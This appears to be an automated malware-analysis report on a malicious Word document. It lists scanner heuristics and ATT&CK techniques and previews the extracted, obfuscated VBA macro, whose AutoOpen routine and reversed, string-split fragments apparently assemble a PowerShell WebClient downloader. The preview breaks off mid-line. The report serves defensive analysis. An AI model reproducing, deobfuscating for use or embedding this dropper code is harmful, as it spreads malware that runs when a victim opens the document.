MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Autoopen' macro and 'Shell()' call indicate an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6547437-0' strongly suggests this is a dropper for further malicious payloads. No specific family could be identified from the available heuristics or script content.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6547437-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6547437-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 161580 bytes |
SHA-256: cb3ff780a64552ee521b5ae16e85980e711df7f9c7e29db6974f374e8ea833aa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wAkVjjEGu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BOLmzX(hKlWoC)
rvnYh = LUqCjF
irwwAz = (DZirr / MqrHIk / 97038 / Fix(KWqNkS)) + 57005 - CLng(XJGsoN + CLng(81219)) + pVqCI + 34652 * vhpkU - CStr(55047) / uwGkTU / CLng(jQiWW)
End Sub
Sub ZlwEw(fRmtw)
sKufvi = EoPKl
tVEFF = (flQnK / klTzRH / 4937 / Fix(uaKME)) + 40893 - CLng(NSNKbM + CLng(99845)) + fbLhh + 32493 * cWkwK - CStr(95572) / HXHHbK / CLng(KrBjP)
TDdjW = joVFaU
pwocHK = (YLqCTl / lUjKzS / 98215 / Fix(YtAZZR)) + 1336 - CLng(RhmhUU + CLng(42937)) + tZRtI + 25858 * PlvuTm - CStr(91159) / CuFaub / CLng(lhXZYV)
DVRwVQ = AFcLS
oiWhzW = (knPub / LnkVio / 9902 / Fix(hadVRf)) + 8195 - CLng(ocOcr + CLng(88226)) + KqaCR + 93247 * FXXiE - CStr(70442) / ktWNB / CLng(EsMiq)
End Sub
Sub iwmfz(RhZiIm)
mRUGzi = TmEisO
nCRisL = (ORTrY / mDpFlj / 48842 / Fix(ojmOz)) + 30436 - CLng(vtDmkG + CLng(58503)) + IAPbXY + 1025 * OZwoQ - CStr(93023) / zJpawS / CLng(QtvkSX)
FnjIZ = EWICqn
YoDbQz = (GdujfL / kWfmGd / 73463 / Fix(lPjrO)) + 89565 - CLng(AnjLkG + CLng(53239)) + UTScIb + 86959 * cNEUz - CStr(55415) / kKwPC / CLng(uZkzfd)
End Sub
Sub Autoopen()
On Error Resume Next
wUbWI = LSnAdh
PDdKZb = (XwAor / CZuhc / 56037 / Fix(lDIlhM)) + 36179 - CLng(wzKSh + CLng(19583)) + qvaaE + 10236 * zUnfji - CStr(72101) / FXAjG / CLng(vscNI)
KLMRrDCMuHViZE (aBpVJ + pUfYmIXpT + diwHC)
sBFnw = cojYr
SzDMuD = (MvzIwi / VUBCZ / 96550 / Fix(bqEFH)) + 87756 - CLng(kUaCJC + CLng(6244)) + LQovJ + 81305 * ttJJjj - CStr(15253) / dwtSqH / CLng(HmJWba)
End Sub
Sub GmcOJ(kOioi)
wLwwNu = hwDQjM
MJBlm = (DUmWj / WwCPU / 9851 / Fix(tKmLow)) + 54811 - CLng(tcCWtC + CLng(9252)) + aNtBPu + 54427 * ZSvXi - CStr(58909) / jKuSua / CLng(MoKQJr)
znPRCc = bDYwh
lVBEU = (vTLwj / WcAEr / 99175 / Fix(koZifF)) + 54404 - CLng(fHHWU + CLng(24515)) + MrmFv + 90436 * RopjHj - CStr(98699) / WMZOz / CLng(MqVzr)
PLEcP = JQJRlD
nWlpzz = (DiluwF / mAARG / 7453 / Fix(jGjMQK)) + 43204 - CLng(sEbVYJ + CLng(5218)) + BWBvIl + 50460 * fJiWQ - CStr(17130) / fzGHQ / CLng(cjnZU)
End Sub
Sub jTbhFk(zvEIa)
fahHcz = jDvVR
lZYmN = (oztqE / cmqJFa / 84080 / Fix(LlbvbL)) + 49984 - CLng(DcXFQ + CLng(5816)) + AaIqml + 92199 * jcfzNc - CStr(48924) / VdkqAz / CLng(LCvnwR)
End Sub
Attribute VB_Name = "zLZoqizjF"
Sub PzrSwL(ZdiCb)
MzCzwo = wzURdU
ZlqAl = (qaBGK / qjNSn / 31333 / Fix(jNqok)) + 1541 - CLng(PwQiZo + CLng(53920)) + nnndQC + 79203 * vvnhzH - CStr(70773) / hBGnMi / CLng(FzqJuK)
End Sub
Function pUfYmIXpT()
On Error Resume Next
jVnFv = fJzUqb
szTwIL = (zYioZF / hiatvb / 47554 / Fix(SurLK)) + 2517 - CLng(Blwln + CLng(8241)) + jrBib + 49636 * mwjqj - CStr(96467) / ZavAWd / CLng(YGwAiZ)
zTTsNk = ZBWEC
RONLKF = (IXLTHo / njtTR / 20189 / Fix(FWaCX)) + 45148 - CLng(oqMOXZ + CLng(2606)) + zqlJEc + 50167 * zkZiZ - CStr(81489) / CnsUL / CLng(mImiIT)
QrhCj = jCrqS("I6E]raHC[]gnIrTS[,PH42yJPH4(EcAlPeR.)'+'43]raHC[]gn'+'IrTS[,)901]raHC[+311]raHC[+78]raHC[((EcAlPeR.)PH4'+'xdDPH4,PH4XJ5PH4(E'+'cAlPeR.)63]raHC[]'+'gnIrTS[,)45]raHC[+27]raHC[+801]raHC[((EcAlPeR.)PH4jpTbs", 50966 + 6 - 50966, 50966 + 194 - 50966)
wEkPEq = ChHGlf
aSwsG = (iJafFp / Khzbv / 16483 / Fix(JvAKZi)) + 8597 - CLng(Vjmjj + CLng(57005)) + qopCV + 98854 * iFJPlb - CStr(41550) / fKcmFf / CLng(oTXtc)
EOHJQ = nQCLMD
dzrvY = (HIOMcD / XQjobD / 78549 / Fix(onmHz)) + 33097 - CLng(DOzDK + CLng(97831)) + XonoQi + 88013 * CfGkcW - CStr(63763) / jJPzo / CLng(EnYXs)
kNMzhQFJQZo = jCrqS("fQcaMPH42PH4+PH482PH4+PH4 ,00001(tPH4+PH4xen.dsaPH4'+'+PH4daPH4+PH4sn6Hl ='+' BSN6Hl;tnePH4+PH4ilCbeW.t'+'PH4+PH4eN.metPH4+PH4sPH4+PH4yS )2yJPH4+PH4tcejboPH4+PH4-2yJ'+'+2yPH4+PH4IA5", 78543 + 4 - 78543, 78543 + 173 - 78543)
zMYsj = tuAnnK
wlHBO = (sWAPuv / FNjAP / 85263 / Fix(oqpGNE)) + 96787 - CLng(mNvVEc + CLng(80278)) + zlKiz + 66907 * wdziYf - CStr(20083) / YvYfH / CLng(AnKqOj)
aEpvX = ZaZPa
snjGw = (bijVNT / SlnzPR / 99580 / Fix(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.